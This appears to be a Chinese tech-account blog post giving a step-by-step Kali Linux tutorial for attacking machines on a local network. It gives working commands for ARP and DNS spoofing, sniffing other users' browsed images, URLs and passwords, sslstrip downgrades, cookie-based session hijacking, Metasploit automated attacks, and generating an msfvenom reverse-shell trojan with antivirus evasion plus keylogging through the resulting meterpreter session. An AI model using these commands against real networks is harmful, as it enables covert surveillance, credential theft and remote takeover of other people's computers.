点击程序IT免费订阅,每天收到这样的好信息
据说全球有1%的人关注了公众号codepro,你很幸运!
前言:中美网战打响的那一刹那,中国已经落后很多年。然而,我们一直没有停止学习的脚步,“师夷长技以制夷”——我们一直奋斗在战争的第一线。经过漫长的沉淀,原来你就在身边不远处。
此处省略1000字,看下面的实操。
1
1、获取内网目标机的浏览图片
工具:arpspoof、driftnet
① 开启Kali的数据转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
② 对目标机进行Arp欺骗:
arpspoof -i eth0 -t 192.168.0.254 192.168.0.71
③ 打开driftnet进行抓包(实验截图如下)。
2
偷窥内网用户浏览过的网页日志
工具:Ettercap、urlsnarf、driftnet
① 开启数据转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
② 打开Ettercap并设置好网卡和攻击目标;
ettercap -G// 启动Ettercap图形界面
③ 打开urlsnarf开始抓取监听到的url并显示;
urlsnarf -i eth0
④ 同时也可以打开driftnet抓取图片。
driftnet -i eth0
3
嗅探内网中的敏感信息
工具:metasploit 的嗅探模块 auxiliary/sniffer/psnuffle
注:
① 实测中得到的数据均是本地机和本机各个虚拟机(桥接)的数据,可能跟虚拟机环境有关,猜想在真实机运行应该可以捕获其它网内机器。
① 后经测试,psnuffle模块应该只是捕获经过本地网卡的数据,需要结合arp欺骗方能达到很好的效果。实测中,我在嗅探时,同时打开了Cain进行arp欺骗,捕获效果非常好。
② 使用ichunqiu和网易登录,并未抓到POST数据包,全是GET的;不过FTP可以成功获取。
4
DNS欺骗
工具:Ettercap
① 编辑etter.dns文件,加入条目,将进行目标网站重定向;
vim /etc/ettercap/etter.dns// 编辑文件
*.xueshen.com A 192.168.0.81// 加入域名定向
② 开启dns欺骗:
ettercap -T -q -P dns_spoof -M arp // //
注:如果报错“Incorrect number of token (///) in TARGET !!”,可将“//”换为“///”即可。
5
Metasploit自动攻击
工具:Metasploit
① 进入msfconsole,连接数据库:
db_connect postgres:toor@127.0.0.1/msf
② 扫描ip段,扫描结果会自动写入数据库:
db_nmap -sS -Pn 192.168.0.1/24
③ 加载db_autopwn插件并执行自动攻击:
load db_autopwn// 加载插件
db_autopwn -t -p -r -e// 根据扫描到的ip的端口情况自动选择模块进行攻击测试
★
注:实际过程中可能会遇到以下错误。
★
5.1 kali2.0中msf连接postgres数据库错误
错误描述:
msf> db_status
postgres selected, no connection
解决办法:
service postgres start
msfdb init
执行命令后,重启msf便会自动连接到数据库。
5.2 无法执行db_autopwn错误
错误描述
msf > db_autopwn -t -p -r -e
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
解决办法:
到GitHub上下载该插件,并放到/usr/share/metasploit-framework/plugins目录下即可。
下载地址:
https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb
6
利用msfvenom生成木马
工具:metasploit
① 生成反弹木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.81 LPORT=5555 -f exe -o /tmp/muma.exe
免杀:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ’\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
② 打开msfconsole进行端口监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.81
set LPORT 5555
exploit
③ 当目标机运行muma.exe后便可得到Shell。
screenshot// 截屏
keyscan_start>keyscan_dump>keyscan_stop// 键盘记录
7
HTTP&HTTPS账号密码获取
工具:arpspoof、ettercap、sslstrip
① 开启数据转发:
echo 1 > /proc/sys/net/ipv4/ip_forward
② 开启Arp欺骗:
arpspoof -i eth0 -t 192.168.0.78 192.168.0.254
③ 编辑etter.conf文件,启用linux的iptables(如果是HTTPS需要此步骤,HTTP不需要);
vim /etc/ettercap/etter.conf
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
sslstrip -a -f -k// 将HTTPS还原为HTTP
缺点:容易出现证书错误
④ 开始抓包:
ettercap -Tq -i eth0
注:实际测试中,http协议可以正常抓取,但是https协议情况下,所有主流现代浏览器都发出安全警示,并禁止继续访问。
8
会话劫持
方法一
工具:arpspoof、wireshark、ferret、hamster
① 开启数据转发:
echo 1 >/proc/sys/net/ipv4/ip_forward
② 开启arp欺骗:
arpspoof -i eth0 -t 192.168.0.71 192.168.0.254
③ 开启wireshark进行抓包,抓包后需要导出为pcap文件;
④ 使用ferret解析文件,生成hasmter.txt文件:
ferret -r cookie.pcap
⑤ 打开hamster软件,然后将浏览器的代理设置为 127.0.0.1:1234;
⑥ 在浏览器中访问 http://127.0.0.1:1234 ,在页面中点击抓到的网页链接获得会话。
方法二
工具:ferret、hamster
① 开启ferret抓包:
ferret -i eth0
② 开启hamster:
hamster
③ 打开浏览器并设置好代理,然后访问http://127.0.0.1:1234,在页面中选择网卡可实时查看抓取到的会话。
方法三
工具:Cookie Cadger
① 打开软件并设置好网卡,然后开启抓包;
java -jar CookieCadger.jar
② 当局域网内有人上网涉及敏感信息,软件就会抓到数据包并罗列出来,只需点选某个网址,加载网站Cookies(Load Domain Cookies)即可实现会话劫持。
注:
① 实测中点击加载cookies后,软件一直“Loading request into browser,please wait...”,使用浏览器浏览也没有劫持到。
② 虽然是java编写的软件,但是在Win10下没找到网卡,无法使用。
Q
8.1 安装ferret时提示“E: 无法定位软件包 ferret”
解决办法:
① 设置更新源:
vim /etc/apt/sources.list// 打开更新源配置文件
② 更新全部软件包:
apt-get update && apt-get dist-upgrade
③ 安装ferret:
apt-get install ferret-sidejack// 注意软件名是ferret-sidejack不是ferret,ferret是别的软件
注:有可能需要添加对32位的支持dpkg --add-architecture i386
Q
8.2 获取Cookie Cadger
最新版本的Kali已经移除了Cookie Cadger,可使用以下命令获取并安装
请长按下方赞赏给予鼓励
领取专属 10元无门槛券
私享最新 技术干货